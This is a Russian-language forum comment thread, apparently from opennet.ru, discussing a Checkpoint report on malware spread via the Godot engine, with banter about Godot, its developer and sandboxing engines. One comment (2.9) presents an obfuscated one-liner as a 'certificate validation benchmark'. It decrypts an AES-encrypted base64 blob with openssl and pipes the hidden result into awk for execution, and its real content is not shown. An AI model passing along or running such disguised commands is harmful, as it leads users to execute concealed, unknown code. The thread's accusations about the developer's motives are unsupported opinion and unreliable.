1.2, Аноним (2), 23:12, 30/11/2024 [ответить] [﹢﹢﹢] [ · · · ]
| +/– |
Ох уж эти злые дядьки из Checkpoint, всю малину портят. Сидели бы молча. И вообще, как они не распустились после того как натворили дел в виндой.
| |
1.3, Bottle (?), 23:33, 30/11/2024 [ответить] [﹢﹢﹢] [ · · · ]
| +1 +/– |
Это самое полезное, что произвёл на свет Godot - потому что кроме вирусни он породил не менее фанатичное сообщество, сравнивающее свою тормозную поделку с Блендером уже на протяжении десятка лет.
| |
1.4, Dzen Python (ok), 23:36, 30/11/2024 [ответить] [﹢﹢﹢] [ · · · ]
| +2 +/– |
Я щас расскажу дядям из Checkpoint про js-майнеры, так они вообще наверное, аж пеной изойдут. Или про вредоносы на lua... Тайпсквотнутые клоны пакетов со вставками для питона в pip... Или любимые виндунами однострочники на Мощщщной Раковине...
| |
|
2.9, Аноним (9), 01:32, 01/12/2024 [^] [^^] [^^^] [ответить]
| +/– |
> Или любимые виндунами однострочники на Мощщщной Раковине...
Эти "однострочники" в 4K экран 4px шрифтом хоть помещаются? 😲
А вот, кстати, однострочный (влазит в экран ноута) э-э-э, бенчмарк валидации серта опеннета:
[CODE]
time echo "U2FsdGVkX1856bpfItIkP2IgSTHMlQT/njNhocA8+gcuSaNCQ78lIr29hCDwKSns\nmarNmtq4gEG0hv6kd8CihCSQqGHmptqXZg9XtNQcBj8="|openssl aes-256-cbc -d -a -k opennet.ru |xargs -0I% awk '%'
[/CODE]
| |
2.14, fuggy (ok), 03:09, 01/12/2024 [^] [^^] [^^^] [ответить]
| +/– |
Вот это да. Шок. На тьюринг-полном языке можно написать вредоносные код.
| |
|
1.6, Аноним (6), 23:41, 30/11/2024 [ответить] [﹢﹢﹢] [ · · · ]
| +2 +/– |
О, в очередной вредоносов пользователи налили сами себе. Ждем следующим шагом слабо рецензируемый Comprehensive Godot Archive Network, в который централизованно будут лить вредоносов под видом минифорков с тайпсквоттинговыми названием. Сколько уже можно ходить по одному и тому же кругу.
| |
1.10, Крикет (?), 01:53, 01/12/2024 [ответить] [﹢﹢﹢] [ · · · ]
| –1 +/– |
Игры нужно делать на своих минималистичных и быстрых движках, а не использовать всякое тормозное и глючное нечто по типу урина энджин.
| |
|
2.11, Bottle (?), 02:01, 01/12/2024 [^] [^^] [^^^] [ответить]
| +/– |
General purpose движки нужны, другое дело, что Godot - это способ осваивания средств через окучивание народа и прогрева на донаты.
Потому что тот же Хуан Линецкий в одну руку принимает донаты через Godot Foundation, через другую - продаёт сервисы к движку (например, оптимизированные мобильные билды от Ramatak) и замедляет его разработку.
| |
2.12, Bottle (?), 02:08, 01/12/2024 [^] [^^] [^^^] [ответить]
| +/– |
При этом у него никогда стояло цели делать на нём игры - он лично разрабатывал для четвёртой версии систему глобального освещения SDFGI, специально скрывая на демонстрационных видео тот факт, что система даёт просадки FPS при любом повороте камеры. Он сделал это осознанно.
| |
2.15, fuggy (ok), 03:15, 01/12/2024 [^] [^^] [^^^] [ответить]
| +/– |
То есть Godot для тебя не минималистичный и быстрый. Тогда Unreal вообще галактического размера для тебя.
Так то есть ты предлагаешь использовать движки написанные васяном за пачку чипсов на VB в котором полвторы функции? Или для каждой игры писать свой движок с нуля?
| |
|
1.13, Аноним (13), 02:58, 01/12/2024 [ответить] [﹢﹢﹢] [ · · · ]
| +/– |
А уж игры для ScummVM-то... Сам ScummVM написан на сишке (то есть по русски - вредоносные ресурсы смогут исполнить произвольный код даже если в движке такой функции не накодено), да ещё многие игры для ResidualVM (ну то есть те, которые ScummVM унаследовала от ResidualVM, плюс последние поступления) основаны на Lua (что есть явный запуск произвольного кода).
Это не говоря уже о других играх на альтернативных движках. Там зачастую то же самое, что и в Lua, только на никому не известном костыльном ЯП, который никто кроме создателей игры, злоумышленника, и мод-сообщества не знает.
Что делать? Тотальное огораживание через landlock как минимум на самых ранних стадиях старта движка, с разрешённой записью только в файлы сейвов, разрешённым чтением только на файлы ресурсов и сейвов, и разрешёнными ioctlами только на устройство GPU. К сожалению - ни в одном альтернативном движке не видел такого. А в стоковых и подавно такого не будет.
| |
|
2.17, fuggy (ok), 03:24, 01/12/2024 [^] [^^] [^^^] [ответить]
| +/– |
Так а кто будет прописывать список разрешённых файлов. Вот этот мод условно пропишет себе что для него сейвы храняться в /usr/bin, а ресурсы хранятся в /etc/passwd и всё. Понятно это условно, но доступ к /home для всех приложений открыт, а юзер сам запустил приложение без проверки.
И вообще на Godot модули можно и на C# и на C++ писать. А там можно разгуляться.
| |
|
|